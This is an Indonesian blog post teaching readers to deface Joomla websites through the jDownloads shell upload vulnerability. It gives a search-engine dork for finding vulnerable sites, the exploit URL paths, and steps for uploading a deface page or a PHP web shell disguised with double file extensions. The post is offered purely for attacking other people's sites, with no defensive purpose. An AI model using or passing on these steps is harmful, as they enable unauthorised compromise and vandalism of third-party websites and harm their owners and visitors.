Maaf baru bisa Share lagi ^_^ , lg ada urusan om ^_^
yoehh Gengs, lanjut lagi Blogwalking:D , Nah kali ini Gue cuma mau berbagi tentang salah satu Exploit Joomla (salah satu Bug/Celah pada CMS Joomla).
ini Bug lawas sih, kali aja masih
Yupz, Tutorial Deface CMS Joomla dengan eXploit Jdownloads Shell Upload Vulnerability .
Let's Play with me Baby ;*
Dork : intext:"Powered by jDownloads"
(gunakan imajinasi vokepers lu, biar dapet yg vuln n verawan)
eXploit :
/index.php?option=com_jdownloads&Itemid=1&view=upload
atau
/index.php?option=com_jdownloads&Itemid=1&task=upload
Script Deface dengan ekstensi deface.html.j, deface.txt.j atau yang mau upload Shellsilahkan siapkan shell.php.php.j
1. Dorking menggunakan Search Engine
2. pilih salah satu web yg pen ditusb0l, Lalu masukan exploitnya.
cth: target.coli/index.php?option=com_jdownloads&Itemid=1&view=upload
3. Vulnerability ~ Muncul Form Seperti Gambar dibawah
4. Lalu isi data2 yang perlu, yang ada tanda merah di depan kotak Form., dan upload script deface atau shell kalian, contoh Gua upload file nue.php.php.j (upload dibagian screenshot)
5. Kalo sukses nanti Muncul icon + berwarna Hijau.
 |
| Note: gak semua file Shell bisa terbaca, jika tak terbaca langsung upload Script Deface kalean saja |
Nah begitu dah kira2 awkkwa.
kalo mau Scanner JDownloads Shell Upload Vulnerability nya bisa kesini
Sekian dan semoga bermanfaat .. terimakasih
sumber -> tkj cyber art
No comments:
Post a Comment